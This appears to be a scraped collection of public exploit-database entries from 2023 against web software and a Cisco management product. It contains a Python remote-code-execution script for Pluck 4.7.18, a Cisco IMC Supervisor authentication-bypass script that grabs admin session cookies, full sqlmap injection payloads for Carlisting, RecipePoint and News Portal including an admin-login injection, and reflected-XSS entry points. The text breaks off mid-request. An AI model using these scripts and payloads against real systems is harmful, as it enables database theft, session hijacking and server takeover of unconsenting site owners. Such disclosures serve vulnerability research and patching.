<pre><code>#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)<br />#Application: pluck<br />#Version: 4.7.18<br />#Bugs: RCE<br />#Technology: PHP<br />#Vendor URL: https://github.com/pluck-cms/pluck<br />#Software Link: https://github.com/pluck-cms/pluck<br />#Date of found: 10-07-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br /><br />import requests<br />from requests_toolbelt.multipart.encoder import MultipartEncoder<br /><br />login_url = "http://localhost/pluck/login.php"<br />upload_url = "http://localhost/pluck/admin.php?action=installmodule"<br />headers = {"Referer": login_url,}<br />login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}<br /><br />file_path = input("ZIP file path: ")<br /><br />multipart_data = MultipartEncoder(<br /> fields={<br /> "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),<br /> "submit": "Upload"<br /> }<br />)<br /><br />session = requests.Session()<br />login_response = session.post(login_url, headers=headers, data=login_payload)<br /><br /><br />if login_response.status_code == 200:<br /> print("Login account")<br /><br /> <br /> upload_headers = {<br /> "Referer": upload_url,<br /> "Content-Type": multipart_data.content_type<br /> }<br /> upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)<br /><br /> <br /> if upload_response.status_code == 200:<br /> print("ZIP file download.")<br /> else:<br /> print("ZIP file download error. Response code:", upload_response.status_code)<br />else:<br /> print("Login problem. response code:", login_response.status_code)<br /><br /><br />rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"<br /><br />rce=requests.get(rce_url)<br /><br />print(rce.text)<br /> <br /></code></pre>
<pre><code># Exploit Title: Carlisting 1.6 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/carlisting/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /><br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br /><br />Path: /carlisting/search.php<br /><br />GET parameter 'brand_id' is vulnerable to SQL Injection<br />GET parameter 'model_id' is vulnerable to SQL Injection<br />GET parameter 'car_condition' is vulnerable to SQL Injection<br />GET parameter 'car_category_id' is vulnerable to SQL Injection<br />GET parameter 'body_type_id' is vulnerable to SQL Injection<br />GET parameter 'fuel_type_id' is vulnerable to SQL Injection<br />GET parameter 'transmission_type_id' is vulnerable to SQL Injection<br />GET parameter 'year' is vulnerable to SQL Injection<br />GET parameter 'mileage_start' is vulnerable to SQL Injection<br />GET parameter 'mileage_end' is vulnerable to SQL Injection<br />GET parameter 'country' is vulnerable to SQL Injection<br />GET parameter 'state' is vulnerable to SQL Injection<br />GET parameter 'city' is vulnerable to SQL Injection<br /><br />https://website/carlisting/search.php?brand_id=[SQLI]&model_id=[SQLI]&car_condition=[SQLI]&price_range=1&car_category_id=[SQLI]&body_type_id=[SQLI]&fuel_type_id=[SQLI]&transmission_type_id=[SQLI]&year=[SQLI]&mileage_start=[SQLI]&mileage_end=[SQLI]&country=[SQLI]&state=[SQLI]&city=[SQLI]<br /><br /><br />---<br />Parameter: brand_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: model_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: car_condition (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: car_category_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: body_type_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: fuel_type_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: transmission_type_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: year (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: mileage_start (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_end=200&country=USA&state=CA&city=Los<br /><br />Parameter: mileage_end (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&country=USA&state=CA&city=Los<br /><br />Parameter: country (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&state=CA&city=Los<br /><br />Parameter: state (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&city=Los<br /><br />Parameter: city (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW<br />---<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: RecipePoint 1.9 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/recipepoint/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /><br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br /><br />Path: /recipepoint/recipe-result<br /><br />GET parameter 'text' is vulnerable to SQL Injection<br />GET parameter 'category' is vulnerable to SQL Injection<br />GET parameter 'type' is vulnerable to SQL Injection<br />GET parameter 'difficulty' is vulnerable to SQL Injection<br />GET parameter 'cuisine' is vulnerable to SQL Injection<br />GET parameter 'cooking_method' is vulnerable to SQL Injection<br /><br /><br />https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI]<br /><br /><br />---<br />Parameter: text (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1<br /><br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1<br /><br />Parameter: category (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1<br /><br />Parameter: type (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1<br /><br />Parameter: difficulty (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1<br /><br />Parameter: cuisine (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1<br /><br />Parameter: cooking_method (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a)<br />---<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass<br />[+] Cisco IMC Supervisor - < 2.2.1.0<br />[+] Date: 08/21/2019<br />[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo<br />[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html<br />[+] Vulnerability Discovery : Pedro Ribeiro<br />[+] Exploit Author: Fatih Sencer<br />[+] CVE: CVE-2019-1937<br />----------------------------------------------------<br /><br />Usage:<br /><br />./python3 CiscoIMC-Bypass.py -u host<br /><br />[+] Target https://xxxxxx.com<br />[+] Target OK<br />[+] Exploit Succes<br />[+] Login name : admin<br />[+] Cookie : REACTED<br /><br />"""<br /><br />import argparse,requests,warnings,base64,json,random,string<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /><br />warnings.simplefilter('ignore',InsecureRequestWarning)<br /><br /><br />def init():<br /> parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')<br /> parser.add_argument('-u','--host',help='Host', type=str, required=True)<br /> args = parser.parse_args()<br /> exploit(args)<br /><br />def exploit(args):<br /> session = requests.Session()<br /> headers = {<br /> "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Referer": "https://{}/".format(args.host),<br /> "X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),<br /> "X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))<br /> }<br /> target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)<br /> print("[+] Target {}".format(args.host))<br /> <br /> exp_send = session.get(target, headers=headers, verify=False, timeout=10)<br /><br /> if exp_send.status_code == 200:<br /> print("[+] Target OK")<br /> body_data = json.loads(exp_send.text)<br /> if not (body_data.get('loginName') is None):<br /> print("[+] Exploit Succes")<br /> print("[+] Login name : {}".format(body_data.get('loginName')))<br /> print("[+] Cookie : {}".format(session.cookies.get_dict()))<br /> else:<br /> print("[-] Exploit Failed")<br /> <br /> else:<br /> print("[-] N/A")<br /> exit()<br /><br />if __name__ == "__main__":<br /> init()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Lawyer CMS 1.6 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/lawyer/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /lawyer/page.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/lawyer/page.php/[XSS]?slug=blog&page=2<br /><br /><br />Path: /lawyer/search.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/lawyer/search.php/[XSS]?search_string=&page=2<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: JobSeeker 1.5 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/jobseeker/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /jobseeker/search-result.php<br /><br />GET parameter 'kw' is vulnerable to RXSS<br />GET parameter 'lc' is vulnerable to RXSS<br />GET parameter 'ct' is vulnerable to RXSS<br />GET parameter 'cp' is vulnerable to RXSS<br />GET parameter 'p' is vulnerable to RXSS<br /><br /><br />https://website/jobseeker/search-result.php?kw=[XSS]&lc=[XSS]&ct=[XSS]&cp=[XSS]&p=[XSS]<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)<br /># Date: 09/07/2023<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c<br /># Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643<br /># Version: 4.0<br /># We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example 1<br />-----------------------------------------------------------------------------------------------------------------------<br />Param: name, email, comment<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /newsportal/news-details.php?nid=13 HTTP/1.1<br />Origin: http://127.0.0.1<br />Sec-Fetch-User: ?1<br />Host: 127.0.0.1:80<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Accept-Encoding: gzip, deflate<br />Sec-Fetch-Site: same-origin<br />sec-ch-ua-mobile: ?0<br />Content-Length: 277<br />Sec-Fetch-Mode: navigate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Connection: close<br />Referer: http://127.0.0.1/newsportal/news-details.php?nid=13<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />sec-ch-ua-platform: "Windows"<br />Cache-Control: max-age=0<br />Content-Type: application/x-www-form-urlencoded<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />Sec-Fetch-Dest: document<br /><br />csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sun, 09 Jul 2023 10:55:26 GMT<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17<br />X-Powered-By: PHP/8.1.17<br />Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 146161<br /><br /><script>alert('comment successfully submit. Comment will be display after admin review ');</script><br /><!DOCTYPE html><br /><html lang="en"><br /><br /> <head><br /><br /> <meta charset="utf-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><br /> <meta name="description" content=""><br /> <meta name="author" content=""><br /><br /> <title>News Portal | Home Page<br /> [...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /newsportal/news-details.php?nid=13 HTTP/1.1<br />Origin: http://127.0.0.1<br />Sec-Fetch-User: ?1<br />Host: 127.0.0.1:80<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Accept-Encoding: gzip, deflate<br />Sec-Fetch-Site: same-origin<br />sec-ch-ua-mobile: ?0<br />Content-Length: 276<br />Sec-Fetch-Mode: navigate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Connection: close<br />Referer: http://127.0.0.1/newsportal/news-details.php?nid=13<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />sec-ch-ua-platform: "Windows"<br />Cache-Control: max-age=0<br />Content-Type: application/x-www-form-urlencoded<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />Sec-Fetch-Dest: document<br /><br />csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sun, 09 Jul 2023 10:56:06 GMT<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17<br />X-Powered-By: PHP/8.1.17<br />Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 525<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><br /><br /><b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21<br />Stack trace:<br />#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')<br />#1 {main}<br /> thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w<br />-----------------------------------------------------------------------------------------------------------------------<br />SQLMap example param 'comment':<br />-----------------------------------------------------------------------------------------------------------------------<br />sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:<br />---<br />Parameter: #2* ((custom) POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=<br />---<br />web application technology: PHP 8.1.17, Apache 2.4.56<br />bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)<br /><br />## Example 2 - login to administration panel<br />-----------------------------------------------------------------------------------------------------------------------<br />Param: username<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /newsportal/admin/ HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 42<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://127.0.0.1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/newsportal/admin/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8<br />Connection: close<br /><br />username=admin'&password=Test%40123&login=<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sun, 09 Jul 2023 11:00:53 GMT<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17<br />X-Powered-By: PHP/8.1.17<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 505<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><br /><br /><b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13<br />Stack trace:<br />#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')<br />#1 {main}<br /> thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /newsportal/admin/ HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 43<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br 